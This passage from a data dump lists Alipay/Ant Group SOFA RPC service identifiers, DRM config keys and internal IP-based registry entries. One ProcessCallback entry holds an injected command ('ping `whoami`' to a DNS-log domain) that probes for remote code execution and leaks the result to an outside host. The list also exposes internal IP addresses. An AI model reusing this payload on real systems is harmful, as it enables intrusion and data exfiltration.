@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendPushService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.FinanceInvestigationPaidServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.PolicyService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:appxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CampConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.3.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdiscountprod.common.service.facade.voucher.api.MerchantVoucherManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:windowsappsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.icif.service.facade.apiv2.ContactWayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.DiscussionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:ROUTER@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.RefundAfterLiquidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionBuyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.172.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.idpatrol.core.service.inspect.mobilegw.MobileRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_APPSTORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitymegadatacalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotbsp.business.facade.item.ItemQueryFacade:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.opm.service.facade.product.ProductConsoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.146.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirecenter.common.service.facade.api.OrderCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:opApprovalCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.PlatformReleaseDrmConfig.tagJsonStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.salary.SalaryMonthQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianQueueMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.119.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.settlecore.service.facade.file.InstFileFetchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.category.DisplayCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.card.BackstageCardTemplateElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.slip.operator.SlipService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecActivityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:antaid_change_subscribe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kaleido.common.service.facade.feedcat.FeedCatTaskTakeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.action.ActionService:1.0:cutchaindanger@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngIsvInfoManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.EcologicalPartnerQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.selfopact.SelfOpActDeliveryOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mobilechat:name=com.alipay.mobilechat.common.gray.client.drm.MobilechatGrayClientDrmSwitch.mwalletmng.grayConfigSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.46.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;ping `whoami`GIYHU5BSMQWTC5LVPJRW2LK7NFXHA5LUL5RWQYLSONSXILLEHFZTO3DZMFZA----.rce.scan.noble.dn5l0g.co;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-S-UNIFIEDLIMIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zdataquery.common.service.facade.hbase.FinSchedulerHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebEteNonBankQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.search.EpBasicSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbccore.facade.alarmProxy.BbcAlarmServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.merchantBatchDetailInstStart,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finlsmicrogw.common.service.facade.gateway.api.ScenarioTreeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:jianjia_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.:name=com.alipay.rep.event.drm.StandardEventResource.enableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.trServerExecutorQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanamountprod.common.service.facade.service.credit.CreditAcceptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.authcenter.facade.MobileTerminalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.timeStopCheckTAFile,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.210.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.manager.ConstraintManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.229.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.life.LifeOrderLinkServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdswindspeed.facade.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthprod.biz.batch.service.HealthBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.AppPackageManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.permission.PermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.nuccChannelSystemIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.credible.SingleCredibleDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:instdispute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dchainbankloan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.trafficcardsp.common.service.facade.TransportRealtimeBusServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.datachecker.DstDataCheckerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instsvcmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sre.cloudpaychecker.facade.account.BillRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.igopcore.common.service.facade.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanGrantEncashConfigDrm.allEncashTimeBaseOnSystemTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.kernel.common.service.facade.StationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finassetprod.common.facade.AssetCertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.core.service.repository.mall.gzone.DeposerInfoRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.xviewcore:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.writeConsistDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.DiscountCacheMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-koialphtwatest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.biz.service.impl.fundmanage.activitycenter.service.ActivityRenderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.SnapReplayParamsDrmResoureInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_pre_open_account@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipass.service.facade.PassQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:aliinvoiceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:accenterAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.core.service.fund.repository.AccountLogRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.instpromo.InstPromoModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bpservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.220.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.214.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaiminvestprod.common.miniprogram.service.facade.EmployeeManage4MiniProgramFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_HLD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antchaos.client.api.AwatchAgentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finfundbankcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.LoginAccountServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.common.service.facade.api.AlCorpCompanyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.usercenter.common.service.facade.authenticator.AuthenticatorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.BlacklistFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PROMOCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.165.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:ccmdatagw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pccontractprod.common.service.facade.api.certify.CertifyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.hvps.HvpsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.product.ProductDailyRateRangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.api.antcloud.spring.AntCloudApiExplorer:1.0:antcloud.achelmetcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_DIDCOMM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openauth.common.service.facade.authtoken.AppToAppAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.cptor.facade.manage.CptorAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.multitenant.api.TenantUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.facade.gateway.service.MockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.share.FinFundQueryWithCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.mohelper.common.service.facade.CertifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_INSPLATFORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.18.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.anteye.blkmirror.MetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_FINANCE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.requiremng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradefront.service.refund.api.TradeAbnormalRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-savemoneytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.edu.CertifyMerchantBackyardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aftscmd.common.service.facade.CmdCenterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.PrivilegeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.trade.HedgeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.quality.ArgoQualityIntelligenceTestSpi:1.0:zplayback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.recharge.MobileSegmentNumberFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.BemcDrillManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.AssetConsultService:1.0:pcreditauthAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.task.TaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskmng.common.service.facade.WorkTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:filefactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.83.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.riskmng.crawlDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.facade.service.mortgage.facade.DisposeInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.backendfacade.api.DataCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acordercore.common.service.facade.subscription.SubscriptionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:linkall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.XtsConfigResource.withoutAcctransType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:suspendforOcrService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:tradecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.infosecTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhcprod.core.repository.CollectionActivityRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recmixer.common.service.facade.CategoryCandidateService:1.0:antmember-rec-dynamic-column@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.intclcn.common.service.facade.AssetSplitClcnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:taskDispatchAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.network.NetworkPlatFormAnalyzeQueryService:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.support.LoanCmdSupportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.baas.admin.endpoint.facade.MetricFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.IsvTaskMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@inspectprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.mychain.dl.facade.PfBizWhiteListQueryFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.findecision.common.service.facade.process.ProcessMngEventServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantOrderPageQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.ProductInnerClientManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.calendar.HaDrillEntityFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csrobotmng.bot.facade.pattern.BotPatternFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:antfeaturemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.finriskcenter.common.facade.api.guardian.GuardianTaskDefineServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uemprod.common.service.facade.merchantinfo.MerchantInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantCacheAccessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.autoaccess.EbppBizTypeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.service.PremiumPrizeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.function.FunctionAopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.escrowexprod.common.service.facade.NotifyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.merchant.api.manage.OmpRecruitApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:tallycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tss.coopr.common.service.facade.pkg.RuleInstanceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.NotifyCheckResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intentionservice.common.facade.IntentionInferenceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.ampf.EnterpriseMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.riskaction.BankCashGapManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mquery.common.service.facade.report.ChargeSummaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:templateEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.cube.CubeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.manager.ClientPerfManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finfoprodCompanySolutionProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepweb.trIndex:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.91.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.igopcore.common.service.facade.api.sandbox.SandboxCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_EXTERFACE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanRestructureConfigDrm.sceneSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.plugin.UserPluginService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.prodmng.golden_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mobilegeocoding:name=com.alipay.mobilegeocoding.core.service.drm.DistrictVersionResource.aMapAttributeMasterVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.domain.manage.facade.api.DomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.TvmSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.snapshot.PublishSnapshotMigrateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.GroupRulesManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.openHomeOperatorMerchantBaseTinyAppMenuSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:imatchfacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.prodmng.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.facade.ContactPointViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_I